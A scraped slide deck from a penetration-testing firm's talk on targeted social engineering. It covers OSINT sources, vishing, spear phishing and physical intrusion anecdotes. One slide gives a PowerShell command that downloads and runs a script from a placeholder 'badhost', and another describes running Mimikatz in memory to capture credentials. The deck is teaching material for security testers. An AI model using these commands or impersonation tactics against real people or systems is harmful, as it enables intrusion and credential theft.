SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. - - PowerPoint PPT Presentation

social imagineering
SMART_READER_LITE
LIVE PREVIEW

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. - - PowerPoint PPT Presentation

Jul 12, 2023 195 likes •426 views

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. Crafting Targeted Social Engineering Attacks leapsecurity.io @LeapSecurity LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written

slide-1
SLIDE 1

LEAP SECURITY

  • Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour.
  • Confidential. Not to be copied, distributed or reproduced without prior written approval.

@LeapSecurity leapsecurity.io

SOCIAL IMAGINEERING

Crafting Targeted Social Engineering Attacks

slide-2
SLIDE 2

@LeapSecurity leapsecurity.io @jonathanbroche

Ex Experience

  • Founder of Leap Security Inc.
  • Security Consultant/Penetration Tester
  • Forensic Analyst

Pu Publica cations

  • Featured on security magazines
  • Hackin9, Pentest Magazine, ACAMS

Sp Speaker

  • Conferences across the nation

To Tools

  • InSpy, Pastepwnd, CredCrack

// //

slide-3
SLIDE 3

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Social Engineering

slide-4
SLIDE 4

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Definition

  • The act of manipulating an

individual(s) to obtain X

  • X is an object or information
slide-5
SLIDE 5

@LeapSecurity leapsecurity.io @jonathanbroche

// //

What’s changed?

  • Education
  • Awareness (sorta)
  • It’s gotten easier for the bad guys too.
  • Don’t speak English? No problem.
  • Services to proof read and spell check

malicious phishing emails

  • Not tech savvy? No problem.
  • Exploit and Ransomware Kits being sold for

$500

slide-6
SLIDE 6

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Attack Methodology

Information Gathering Attack Preparation Exploitation

slide-7
SLIDE 7

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Attack Methodology (Cont.)

  • Information Gathering
  • Google, Bing, Shodan
  • Social Media – LinkedIn/Twitter/Facebook
  • Metadata
  • Surveillance (Physical Intel)

Information Gathering Attack Preparation Exploitation

slide-8
SLIDE 8

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Attack Methodology (Cont.)

  • OSINT Favorites
  • HaveIBeenPwn
  • https://haveibeenpwned.com/
  • OSINT Framework
  • https://osintframework.com/
  • Intel Tools
  • https://inteltechniques.com/
  • Dragnet
  • https://github.com/tevora-

threat/Dragnet

slide-9
SLIDE 9

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Pastepwnd Demo

https://github.com/leapsecurity/Pastepwnd

slide-10
SLIDE 10

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Attack Methodology (Cont.)

  • Attack Preparation
  • Get to know your target
  • Pick a persona to impersonate
  • Obtain target email signature
  • Build, Buy, or Prepare Tools
  • Spoof Services
  • Circumvent defensive technologies
  • Entice users with rewards

Information Gathering Attack Preparation Exploitation

slide-11
SLIDE 11

@LeapSecurity leapsecurity.io @jonathanbroche

// //

slide-12
SLIDE 12

@LeapSecurity leapsecurity.io @jonathanbroche

// //

InSpy Demo

https://github.com/leapsecurity/InSpy

slide-13
SLIDE 13

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Attack Methodology (Cont.)

  • Exploitation
  • Slow and steady
  • Lateral movement
  • Sensitive data or objective
  • Exfiltration

Information Gathering Attack Preparation Exploitation

slide-14
SLIDE 14

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Common Exploit Techniques

  • HTA – HTML Applications can be

embedded on website

  • Macros
  • Executables
slide-15
SLIDE 15

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Common Exploit Techniques (Cont.)

  • PowerShell
  • IEX (New-Object

Net.WebClient).DownloadString('http://badhost/hackerscript.ps1’)

  • C#
  • Visual Basic
slide-16
SLIDE 16

@LeapSecurity leapsecurity.io @jonathanbroche

// //

PS DownloadString functionality example

  • Logged into workstations

via SMB

  • Use PowerShell script in

memory to capture cleartext credentials using Mimikatz (Wdigest)

  • Until it found a domain

administrator account

slide-17
SLIDE 17

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Example: Vishing

  • Targeted Customer Service

Representatives within the Bank

  • Impersonated contractor working with

help desk

  • Obtained help desk extension
  • Discovered MobileIron
  • Called Help Desk and obtained AD

account

slide-18
SLIDE 18

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Example: Spear Phishing

  • Custom website (HTML, CSS, JS, PHP)
  • Rebrand scenario
slide-19
SLIDE 19

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Example: Physical Test

  • Cold brrr, no snow brush
  • Responder, cracked NTLM hashes
  • Became friends with security

guard

  • Became best friends with

employee and got a tour of the facility

slide-20
SLIDE 20

@LeapSecurity leapsecurity.io @jonathanbroche

// //

Closing and Questions

slide-21
SLIDE 21

LEAP SECURITY

  • Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour.
  • Confidential. Not to be copied, distributed or reproduced without prior written approval.

Thank you!!!

@LeapSecurity leapsecurity.io @jonathanbroche

// //